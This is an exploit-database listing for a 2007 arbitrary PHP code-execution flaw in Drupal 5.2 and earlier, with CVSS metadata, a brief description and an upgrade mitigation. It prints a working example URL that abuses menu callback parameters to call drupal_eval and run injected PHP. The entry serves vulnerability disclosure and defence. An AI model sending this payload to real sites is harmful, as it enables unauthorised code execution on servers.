header-logo
Suggest Exploit
vendor:
Drupal
by:
milw0rm.com
7.5
CVSS
HIGH
PHP Zend Hash Vulnerability
CWE
Product Name: Drupal
Affected Version From: <= 5.2
Affected Version To: <= 5.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector

This exploit targets a vulnerability in Drupal versions up to 5.2. It utilizes the PHP Zend Hash vulnerability to execute arbitrary code. By manipulating the URL parameters, an attacker can inject malicious PHP code and execute it on the target system.

Mitigation:

Upgrade to a version of Drupal higher than 5.2.
Source

Exploit-DB raw data:

Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector

Example: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();

# milw0rm.com [2007-10-10]

Navigation

Suggest Exploit

Services By CQR